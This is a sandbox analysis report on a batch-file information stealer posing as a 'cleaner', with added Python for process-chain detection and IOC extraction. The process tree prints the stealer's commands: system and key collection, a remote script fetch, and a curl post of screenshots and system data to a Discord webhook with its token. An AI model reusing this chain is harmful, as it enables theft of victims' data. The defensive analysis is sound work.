Analysis Overview
SHA256
ab22ed1dc9c0a8eb99a8d0c4e496671c930e07d57b628da59fc30ad0900c6763
Threat Level: Known bad
The file SchooiCleaner_F1.0.bat was found to be: Known bad.
Malicious Activity Summary
HawkEye
Blocklisted process makes network request
Executes dropped EXE
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Gathers network information
Gathers system information
Delays execution with timeout.exe
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Analysis: static1
Detonation Overview
Reported
2024-07-14 13:12
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-14 13:12
Reported
2024-07-14 13:14
Platform
win11-20240709-en
Max time kernel
37s
Max time network
35s
Command Line
Signatures
HawkEye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\screenCapture.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.ipify.org | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"
C:\Windows\system32\mode.com
mode con cols=80 lines=30
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\chcp.com
chcp 437
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ping -4 -n 1 IMKBEUOX | findstr [
C:\Windows\system32\PING.EXE
ping -4 -n 1 IMKBEUOX
C:\Windows\system32\findstr.exe
findstr [
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell Invoke-RestMethod api.ipify.org
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-RestMethod api.ipify.org
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\system32\ipconfig.exe
ipconfig
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\System32\Wbem\WMIC.exe
wmic path softwarelicensingservice get OA3xOriginalProductKey
C:\Windows\system32\timeout.exe
timeout /t 5 /NOBREAK
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2100.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP"
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
screenCapture.exe screenshot.png
C:\Windows\system32\curl.exe
curl -k -F "payload_json={\"content\": \"~=CONNECTION ESTABLISHED=~ \nDate: Sun 07/14/2024 \nTime: 13:13:16.45 \nUsername: Admin \nComputer Name: IMKBEUOX \nPublic IP: 194.110.13.70 \nPrivate IP: 10.127.1.81 \nInfo and Screenshot:\"}" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" -F "[email protected]" https://discord.com/api/webhooks/1261736323010658460/E56nbaTRqMAZ8v2KmIz3ZKgD35WEj6DZ_NhqOt64zU8fUyeY3iDM1IQR01LPvnCAq7C9
C:\Windows\system32\timeout.exe
timeout /t 3
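The process tree above is the whole stealer in one pass: an external IP lookup through api.ipify.org, ipconfig and systeminfo written to text files, the OEM product key pulled with `wmic ... get OA3xOriginalProductKey`, a screenshot helper fetched from raw.githubusercontent.com and compiled on the host with csc.exe, and everything posted with `curl -k` (certificate checks off) to a Discord webhook. Each step is a legitimate built-in, so the useful detection is the combination of command lines rather than any single binary. The following Python is an added example, not part of the sandbox report and not the sample's code: it runs a small set of command-line rules over constructed Sysmon-style process-creation events that mirror the tree above (the Discord webhook ID and token in the events are placeholders, not the sample's), scores the chain, and pulls the webhook ID and token out of the curl command so the webhook can be reported and the URL blocked.

```python
"""Process-chain detections for the stealer pattern in this report.

Added example, not from the sandbox report or the sample: the events are
constructed to mirror the report's process tree, and the Discord webhook
ID and token are placeholders, not the sample's.
"""
import re

# Constructed Sysmon-style process-creation events (Image, CommandLine); not real telemetry.
EVENTS = [
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SchooiCleaner_F1.0.bat"'},
    {"image": r"C:\Windows\system32\timeout.exe", "cmdline": "timeout /t 5 /NOBREAK"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Invoke-RestMethod api.ipify.org"},
    {"image": r"C:\Windows\System32\Wbem\WMIC.exe",
     "cmdline": "wmic path softwarelicensingservice get OA3xOriginalProductKey"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -Command "irm -useb https://raw.githubusercontent.com/npocmaka/batch.scripts/master/hybrids/.net/c/screenCapture.bat"'},
    {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /nologo /r:"Microsoft.VisualBasic.dll" /out:"screenCapture.exe" "C:\Users\Admin\AppData\Local\Temp\SCREEN~1.BAT"'},
    {"image": r"C:\Windows\system32\curl.exe",
     "cmdline": 'curl -k -F "payload_json={\\"content\\": \\"~=CONNECTION ESTABLISHED=~\\"}" '
                '-F "file1=@screenshot.png" '
                'https://discord.com/api/webhooks/123456789012345678/PLACEHOLDER_TOKEN_abc'},
    # Benign control: the same binary hitting an internal endpoint must not fire anything.
    {"image": r"C:\Windows\system32\curl.exe",
     "cmdline": "curl -s https://intranet.example.internal/health"},
]

IP_LOOKUP_HOSTS = ("api.ipify.org", "ifconfig.me", "icanhazip.com", "ipinfo.io")
DISCORD_WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/(\d+)/([A-Za-z0-9_-]+)")
FETCH_CMDLET_RE = re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b", re.I)
TEMP_DIR_RE = re.compile(r"\\appdata\\local\\temp\\", re.I)

# rule name -> (ATT&CK technique, predicate over (image basename, command line))
RULES = {
    "external_ip_lookup": ("T1016", lambda img, cl:
        img in ("powershell.exe", "curl.exe") and any(h in cl.lower() for h in IP_LOOKUP_HOSTS)),
    "wmic_product_key": ("T1082", lambda img, cl:
        img == "wmic.exe" and "oa3xoriginalproductkey" in cl.lower()),
    "remote_script_fetch": ("T1105", lambda img, cl:
        img == "powershell.exe" and bool(FETCH_CMDLET_RE.search(cl))
        and "raw.githubusercontent.com" in cl.lower()),
    "csc_compile_from_temp": ("T1027.004", lambda img, cl:
        img == "csc.exe" and "/out:" in cl.lower() and bool(TEMP_DIR_RE.search(cl))),
    "discord_webhook_post": ("T1567", lambda img, cl:
        img in ("curl.exe", "powershell.exe") and bool(DISCORD_WEBHOOK_RE.search(cl))),
}


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Map each rule that fired to the command lines that triggered it."""
    hits = {}
    for ev in events:
        img = basename(ev["image"])
        for name, (_technique, pred) in RULES.items():
            if pred(img, ev["cmdline"]):
                hits.setdefault(name, []).append(ev["cmdline"])
    return hits


def verdict(hits):
    """Webhook exfil plus at least two collection/staging signals: call it a stealer chain.
    A lone ipify lookup or a lone csc.exe run is common in admin tooling and stays inconclusive."""
    if "discord_webhook_post" in hits and len(hits) >= 3:
        return "stealer-chain"
    return "inconclusive"


def extract_discord_webhook(cmdline):
    """Return (webhook_id, token) so the webhook can be reported/revoked and the URL blocked."""
    m = DISCORD_WEBHOOK_RE.search(cmdline)
    return (m.group(1), m.group(2)) if m else None


if __name__ == "__main__":
    fired = evaluate(EVENTS)
    for name, lines in fired.items():
        print(f"[{RULES[name][0]}] {name}: {len(lines)} hit(s)")
    print("verdict:", verdict(fired))
    for line in fired.get("discord_webhook_post", []):
        print("webhook:", extract_discord_webhook(line))
```

On a Sysmon or EDR feed the same predicates apply to Event ID 1 `Image` and `CommandLine` fields; the verdict deliberately requires the webhook post plus two other signals, because each rule on its own (an ipify check, an ad-hoc csc.exe build, a raw GitHub download) has legitimate users. The extracted webhook ID and token are the actionable indicators here: the IPs behind discord.com are shared Cloudflare space and are not safe to blocklist.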
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49810 | N/A | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
memory/2560-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2560-9-0x0000022C57FF0000-0x0000022C58012000-memory.dmp
memory/2560-10-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
memory/2560-11-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
memory/2560-12-0x0000022C585D0000-0x0000022C58792000-memory.dmp
memory/2560-15-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | bdc7698e710ff3ab8d3082fe5cee6627 |
| SHA1 | ae5d83861547ec78e37c54bc097b395869c25be3 |
| SHA256 | 1089a92b42dcc3f7c6a4f368c7a3adf3fec33096842efb24de04ecd7c96c8dad |
| SHA512 | 08ca96be8fc8e6637de3e12fcea0b622f9858a3c1785ab02426202f1e17c973b1a53676c39dd41dcf755352ef863b1e58e204a8522a3b907267ff3a4b639ecaa |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 30d2d4c82b76613c32e68fbc259cacbf |
| SHA1 | 3057fc35febc98a40407d15f62ab2f3a1028a9d8 |
| SHA256 | 97ea1ead9fad2488820c1fcc3dbd163043126d0a64251c8b20aca81a3b6e0dda |
| SHA512 | 6afac1e6a952cd60574b5e776cc7ad13d5ca95d31f3131016daa6a5d814d25d7851ddcba2d3c7b7f2c3c40df16d34b241cebbfa53894fa627952688904325007 |
C:\Users\Admin\AppData\Local\Temp\screenCapture.bat
| MD5 | 7c39bedd33b129b84117cb4e188eb9b6 |
| SHA1 | 43e660c225a60a8327c7ce73ab6abaddcd412122 |
| SHA256 | 2490bf909afee37ddc6dca73d51950c648b815b8d5a1fd853ad9f69413f4a711 |
| SHA512 | de368b8161612f7998f98b15a36028068b08052fceb2468855005cdc5ae6e44bebc8e6d3f0b6d340cd6308597863c003a353fe95eedd6a0a5bb4320e36ba7490 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC8847EBA4E1654F15B041DCA8FF9E22D4.TMP
| MD5 | b4aaae3b532554d0c7bd317d4834ab16 |
| SHA1 | 28c854e399a3993ffd0df37b4385e29b4fe12905 |
| SHA256 | d7b2270159728b32e1ed60b03900ab7c9cb3c27df8f2456eae6824ad12f00f62 |
| SHA512 | ac6d36c61b057a0196cda5e249c5184a983bbf490ff1b54a6f263417e10c071addcb8437c840592e31637905e1fee10912e5932f9982e2abedc68cbb4a5e96a8 |
C:\Users\Admin\AppData\Local\Temp\RES2100.tmp
| MD5 | 2b2865f9b0bc8e1e3427802d123e3f64 |
| SHA1 | b28cf208d8df3252e21e2e76f892a9b54b07971d |
| SHA256 | ba2f0b1e7b61c763391cc592f23028ef43b2310d4e9d5d64244576e336634eb2 |
| SHA512 | d90069d6d0da337b973a80d727d85f4e3604a10fa2464cd02d591904a011472b8d0236ff0f75d3c4cbf7afd2b58006daffc08c9e09a3d21b78dc943a185a836f |
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
| MD5 | c26bbbdf6bae2b13bd931c77944d8f1f |
| SHA1 | 80f13a90b702c99e71d23060af1801a0f1433753 |
| SHA256 | 313028ef89b2462d6afc5446c21c5ed60bdc18d7075c713681bd310622898ffd |
| SHA512 | bb7bd96889c474c29e0504b6751de98069d86fed200ac395e3608af92e59467197e7f63174ad345cfaef8b49eb3cee3c4bbf2dd8b68de6714cf2f85d1b12d447 |
memory/724-63-0x0000000000790000-0x0000000000798000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\screenshot.png
| MD5 | e17e867c13a606881c19af05e2f032c7 |
| SHA1 | 44b4fa7594e0ddea3585b96b5d67fa67a3668cbd |
| SHA256 | 5b8636f0d5ce69f86e8bdf5334d89d1022d2e19edd2216212a921572a9789454 |
| SHA512 | 300454eeccf97c2556f0d2f767a8e76a0cd03a34b62059fa906522f72c122c21719ebb08752d7f2213d857d800fa17666b20f0877d76d814662fbc5bc86c35b2 |
C:\Users\Admin\AppData\Local\Temp\liscense.txt
| MD5 | b77c85675375ed548a4c019ae9ad5eda |
| SHA1 | f1f6559245707e38403b72c57f201784f1086f7d |
| SHA256 | 81a02546f3d9da106053d1800ba1a0c00815a8903661b5c1c086a5c88aedd1f9 |
| SHA512 | 3d6cdefda811dcaaff88f54117f03bfff04a04ba03efdf45167a7c4712bab3334974b404421d5bd1e3ad7eb65b0c390ddf472f9d256bd0cd8786e87ab8571bef |
C:\Users\Admin\AppData\Local\Temp\dir.txt
| MD5 | 4f7c335086aa1e994a32fa877cbfcdea |
| SHA1 | b1f77e8fda9c6d5792f25de72dd897130604a3e1 |
| SHA256 | af7b33f8b82794179a097fc8bffb2edfdb854e0f0f280c1fe5bc93e8d0b683e2 |
| SHA512 | 657c7d3086a6bd8418d53b43689f416f3e607f5c46c9cc88e4a732319c8901db1417d746b93f65ddeb20f921810ec4ac9464c6e1d2ebabb68ceb685d6166d0cd |
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt
| MD5 | 17a00ddef13a77fea662458994164ff5 |
| SHA1 | 529cde1ee203abbc15d8bdc796947a7e3586e531 |
| SHA256 | 8be7fbb0dfd6a6e999ba11ccc08c1883d8884bd9ed5b79f9d0833230c99ab57b |
| SHA512 | f90efbd6ed21c5c4128de7a46ad86cc3bed256d24923f400df2c00bcda7922350977cf21b194167e54c87e6e3b168fa89da97bca8ab14814c4c127709963d805 |
C:\Users\Admin\AppData\Local\Temp\ipconfig.txt
| MD5 | d78118f5f9b8716449d87d231f6993ed |
| SHA1 | d7d2d4783f3d40c5af355091d70f9ad4d4335ab7 |
| SHA256 | c1502b621b88e46f262a466d8bffabef3e7095ff012a0a52fe38ee4343b0c135 |
| SHA512 | cac300ec07dab390ebb3265763a93189c9d91c8ea78c597b077f3bd7ea7ef14a5779233dc053cbb877cf3454c60e0059585aa252903ba6ff297a5d3fe59676c3 |
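Not everything in the Network and Files sections above is an indicator of this sample. `__PSScriptPolicyTest_*.ps1`, `StartupProfileData-NonInteractive` and `CLR_v4.0\UsageLogs\powershell.exe.log` are written by PowerShell and the .NET runtime on any invocation, the 8.8.8.8:53 rows are the sandbox resolver, the 127.0.0.1 row is loopback, and the remote addresses belong to shared CDN infrastructure used by legitimate traffic. The following Python is an added example, not part of the sandbox report: it parses a constructed excerpt written in the report's own layout (hashes copied from the Files section above), separates observed domains from public remote IPs, and exports SHA256 values only for the files the sample actually dropped.

```python
"""IOC extraction from the Network and Files sections of this report format.

Added example, not part of the sandbox report. SAMPLE_REPORT is a constructed
excerpt in the report's own layout (hashes copied from the report); it is not
the full page.
"""
import ipaddress
import re

SAMPLE_REPORT = r"""
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.12.205:80 | api.ipify.org | tcp |
| US | 8.8.8.8:53 | 205.12.26.104.in-addr.arpa | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49810 | N/A | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
Files
memory/2560-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvfizt1j.dgv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
C:\Users\Admin\AppData\Local\Temp\screenCapture.exe
| MD5 | c26bbbdf6bae2b13bd931c77944d8f1f |
| SHA1 | 80f13a90b702c99e71d23060af1801a0f1433753 |
| SHA256 | 313028ef89b2462d6afc5446c21c5ed60bdc18d7075c713681bd310622898ffd |
C:\Users\Admin\AppData\Local\Temp\screenshot.png
| MD5 | e17e867c13a606881c19af05e2f032c7 |
| SHA256 | 5b8636f0d5ce69f86e8bdf5334d89d1022d2e19edd2216212a921572a9789454 |
"""

SECTION_RE = re.compile(r"^(Network|Files)$")
HASH_ROW_RE = re.compile(r"^\|\s*(MD5|SHA1|SHA256|SHA512)\s*\|\s*([0-9a-f]+)\s*\|$")
# Artifacts PowerShell/.NET write on every launch; their hashes identify nothing malicious.
SANDBOX_NOISE = ("__PSScriptPolicyTest_", "\\CLR_v4.0\\UsageLogs\\", "\\PowerShell\\StartupProfileData")


def parse_report(text):
    """Return (network_rows, {file_path: {algo: digest}}) from the Network/Files sections."""
    section, current = None, None
    network, files = [], {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if SECTION_RE.match(line):
            section, current = line, None
        elif section == "Network" and line.startswith("|") and not line.startswith("| Country"):
            cells = [c.strip() for c in line.strip("|").split("|")]
            if len(cells) == 4:
                network.append(dict(zip(("country", "dest", "domain", "proto"), cells)))
        elif section == "Files":
            m = HASH_ROW_RE.match(line)
            if m and current is not None:
                files[current][m.group(1)] = m.group(2)
            elif line.startswith("memory/"):
                current = None          # memory dumps: no file hash to export
            elif not m:
                current = line          # a dropped-file path; hash rows follow it
                files.setdefault(current, {})
    return network, files


def network_iocs(network, resolver_port="53"):
    """Observed domains (minus reverse lookups) and public remote IPs (minus resolver, loopback, RFC1918)."""
    domains, ips = set(), set()
    for row in network:
        host, _, port = row["dest"].rpartition(":")
        addr = ipaddress.ip_address(host)
        if port != resolver_port and not (addr.is_private or addr.is_loopback):
            ips.add(host)
        if row["domain"] != "N/A" and not row["domain"].endswith(".in-addr.arpa"):
            domains.add(row["domain"])
    return sorted(domains), sorted(ips)


def file_iocs(files):
    """Map dropped-file names to SHA256, dropping PowerShell/.NET side effects."""
    return {path.rsplit("\\", 1)[-1]: h["SHA256"]
            for path, h in files.items()
            if "SHA256" in h and not any(n in path for n in SANDBOX_NOISE)}


if __name__ == "__main__":
    net, dropped = parse_report(SAMPLE_REPORT)
    domains, ips = network_iocs(net)
    print("domains:", domains)
    print("remote IPs (shared CDN space, do not blocklist blindly):", ips)
    for name, sha in file_iocs(dropped).items():
        print(f"{name}: {sha}")
```

The three domains are all legitimate services abused by the sample, so the domain list is for hunting (who else resolved raw.githubusercontent.com and then posted to discord.com from curl.exe?) rather than for blocking; the SHA256 of screenCapture.exe is the one value here that can go straight into a blocklist, and screenshot.png is a per-victim artifact whose hash will never recur.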